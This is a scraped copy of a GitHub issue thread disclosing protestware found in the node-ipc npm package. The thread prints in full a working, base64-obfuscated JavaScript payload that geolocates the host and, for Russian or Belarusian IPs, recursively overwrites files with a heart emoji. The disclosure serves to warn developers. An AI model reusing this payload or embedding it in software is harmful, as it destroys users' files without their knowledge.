!!!!!!!!!!!! Please do something to warn USERS besides publishing new versions ·...
source link: https://github.com/vuejs/vue-cli/issues/7054
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
@RIAEvangelist deleting the original comment, but it does not matter to the fact.
Original post by @Mister-Hope which has been deleted.
@RIAEvangelist
I did some digging into recent commits in this repository.What the actual f--k are you doing here:
| The following code is malicious, DO NOT RUN IT
| The above code is malicious, DO NOT RUN IT
I deobfuscated the code and found out that if the host machine's ip address was from Russia or Belarus, your code would proceed to nuke their files by overwriting everything:
| The following code is malicious, DO NOT RUN IT
import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer.from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with `❤️` } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };| The above code is malicious, DO NOT RUN IT
The following are excerpts from the malicious code:
Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if ip country is Russia or Belarusa.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with `❤️`You should be ashamed of yourself, this level of gross malice towards fellow developers is not ok.
Edit: please reference GalvinGao's comment
RIAEvangelist/node-ipc#233 (comment)
hmmm, seems the file has been already deleted (https://github.com/RIAEvangelist/node-ipc/commits/master/dao/ssl-geospec.js) and the version affected
v10.1.3
has already been either taken down, or the user has deleted it, from npm, as it is currently already not existed on npm.Still, the publisher's activity, to my evaluation, is kinda suspicious. Whether the file was introduced intentionally or unintentionally, the security concerns of using this package has already planted.
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK